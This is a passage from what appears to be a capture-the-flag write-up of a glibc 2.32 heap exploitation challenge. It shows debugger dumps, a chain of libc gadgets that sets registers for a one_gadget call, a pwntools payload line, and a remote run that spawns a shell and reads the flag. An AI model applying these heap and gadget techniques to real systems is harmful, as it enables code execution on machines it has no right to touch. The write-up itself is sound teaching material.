0x7ffff7ffe220:	0x0000000000000040	0x0000000000000000
0x7ffff7ffe230:	0x000055555555d610	0x0000000000000040
0x7ffff7ffe240:	0x0000000000000000	0x000055555555d5c0

gef➤  x/10gx 0x000055555555ee70
0x55555555ee70:	0x5a5a5a5a5a5a5a5a	0x00000000deadbeef
0x55555555ee80:	0x0000000000000000	0x0000000000000000
0x55555555ee90:	0x0000000000000000	0x0000000000000031
0x55555555eea0:	0x0000000000000041	0x0000000000000000
0x55555555eeb0:	0x0000000000000000	0x0000000000000000

So, yeah, that’s the reason, I put that chunk there previously (hard to explain this whole mess in the right order).

By using the above gadget, we can point rax to our chunk on the heap, and it will then jump to rax+0x8 (which currently is 0xdeadbeef). Not quite there yet, but at least we have one register more containing an address, which is under our control.

$rax   : 0x000055555555ee70  →  0x5a5a5a5a5a5a5a5a ("ZZZZZZZZ"?)
$rbx   : 0x00007ffff7ffd000  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rcx   : 0x0               
$rdx   : 0x0000555555557dd8  →  0x0000555555555170  →  <__do_global_dtors_aux+0> endbr64 
$rsp   : 0x00007fffffffda70  →  0x00007ffff7f2cd4b  →  0x0000059a840fc085
$rbp   : 0x00007fffffffdaf0  →  0x0000000000000000
$rsi   : 0x0               
$rdi   : 0x0000555555558060  →  0x00007ffff7fc2520  →  0x00000000fbad2887
$rip   : 0xdeadbeef        
$r8    : 0x2               
$r9    : 0x1               
$r10   : 0x00007ffff7f73ac0  →  0x0000000100000000
$r11   : 0x246             
$r12   : 0x0               
$r13   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$r14   : 0x0000555555557dd0  →  0x00005555555551c0  →  <frame_dummy+0> endbr64 
$r15   : 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda70│+0x0000: 0x00007ffff7f2cd4b  →  0x0000059a840fc085	 ← $rsp
0x00007fffffffda78│+0x0008: 0x00007ffff7fe16ad  →  0x8b0e75f685c4758b
0x00007fffffffda80│+0x0010: 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f	 ← $r13
0x00007fffffffda88│+0x0018: 0x00007ffff7ffe750  →  0x00007ffff7fce000  →  0x00010102464c457f
0x00007fffffffda90│+0x0020: 0x00007ffff7fc8000  →  0x00007ffff7dff000  →  0x03010102464c457f
0x00007fffffffda98│+0x0028: 0x00007ffff7ffda08  →  0x00007ffff7fd0000  →  0x00010102464c457f
[!] Cannot access memory at address 0xdeadbeef

Still, we just went from one crash to another…

But, we can now branch into another gadget:

0x7ffff7e7a4c7:	mov    rdx,QWORD PTR [rbx+0x40]
0x7ffff7e7a4cb:	mov    rdi,rbx
0x7ffff7e7a4ce:	sub    rdx,rsi
0x7ffff7e7a4d1:	call   QWORD PTR [rax+0x70]
payload = "Z"*8 + p64(libc.address+0x000000000007b4c7)
	
addfake(20, payload)

When executing this

$rax   : 0x000055555555ee70  →  0x5a5a5a5a5a5a5a5a ("ZZZZZZZZ"?)
$rbx   : 0x00007ffff7ffd000  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rcx   : 0x0               
$rdx   : 0x0000555555557dd8  →  0x0000555555555170  →  <__do_global_dtors_aux+0> endbr64 
$rsp   : 0x00007fffffffda70  →  0x00007ffff7f2cd4b  →  0x0000059a840fc085
$rbp   : 0x00007fffffffdaf0  →  0x0000000000000000
$rsi   : 0x0               
$rdi   : 0x0000555555558060  →  0x00007ffff7fc2520  →  0x00000000fbad2887
$rip   : 0x00007ffff7e7a4c7  →  0x48df894840538b48
$r8    : 0x2               
$r9    : 0x1               
$r10   : 0x00007ffff7f73ac0  →  0x0000000100000000
$r11   : 0x246             
$r12   : 0x0               
$r13   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$r14   : 0x0000555555557dd0  →  0x00005555555551c0  →  <frame_dummy+0> endbr64 
$r15   : 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7e7a4ba                  cmp    rdx, r13
   0x7ffff7e7a4bd                  jae    0x7ffff7e7a718
   0x7ffff7e7a4c3                  mov    rsi, QWORD PTR [rbx+0x10]
 → 0x7ffff7e7a4c7                  mov    rdx, QWORD PTR [rbx+0x40]
   0x7ffff7e7a4cb                  mov    rdi, rbx
   0x7ffff7e7a4ce                  sub    rdx, rsi
   0x7ffff7e7a4d1                  call   QWORD PTR [rax+0x70]
   0x7ffff7e7a4d4                  test   rax, rax
   0x7ffff7e7a4d7                  jle    0x7ffff7e7a6b0
──────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda70│+0x0000: 0x00007ffff7f2cd4b  →  0x0000059a840fc085	 ← $rsp
0x00007fffffffda78│+0x0008: 0x00007ffff7fe16ad  →  0x8b0e75f685c4758b
0x00007fffffffda80│+0x0010: 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f	 ← $r13
0x00007fffffffda88│+0x0018: 0x00007ffff7ffe750  →  0x00007ffff7fce000  →  0x00010102464c457f
0x00007fffffffda90│+0x0020: 0x00007ffff7fc8000  →  0x00007ffff7dff000  →  0x03010102464c457f
0x00007fffffffda98│+0x0028: 0x00007ffff7ffda08  →  0x00007ffff7fd0000  →  0x00010102464c457f

gef➤  x/gx $rbx+0x40
0x7ffff7ffd040:	0x0000000000000000

This will now move the value from rbx+0x40 (0x0) into rdx and then call rax+0x70. So, this will effectively zero out rdx and we fulfilled the constraints for the one_gadget from above (r12 == 0 & rdx == 0).

Remember, that I put the one_gadget address previously in one of the fake chunks? Surprise, it’s now exactly at rax+0x70

Finally at the end of the journey :)

$ python xpl.py 1
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to chall.polygl0ts.ch on port 3800: Done
[*] LEAK         : 0x55a9f31a0b09
[*] HEAP         : 0x55aca9d09600
[*] HEAP guard   : 0x55aca9d09
[*] LIBC leak    : 0x7fb8f7cafa60
[*] LIBC         : 0x7fb8f7aed000
[*] MAIN_ARENA   : 0x7fb8f7cafa00
[*] PIE          : 0x55aca8ac2080
[*] TARGET CHUNK : 0x7fb8f7ce61d0
[*] Paused (press any to continue)
[*] Switching to interactive mode
Goodbye! Thank you for using Nile.
$ ls
flag
ld-2.32.so
libc-2.32.so
run
$ cat flag
EPFL{Y3t_4n0th3r_h34pn0t3_th4t_w4s_1n_my_chall3ng3s_f0lder_f0r_t00_l0ng}

Phew, this challenge took a lot of time, going down so many rabbit holes, redoing the code execution part again and again. Though, I was cursing a LOT in the middle of the night, I enjoyed the challenge quite a lot in hindsight.

Still, quite curious for other peoples solution, to see, if it can be solved in an easier way, since this one was definitely a real pain.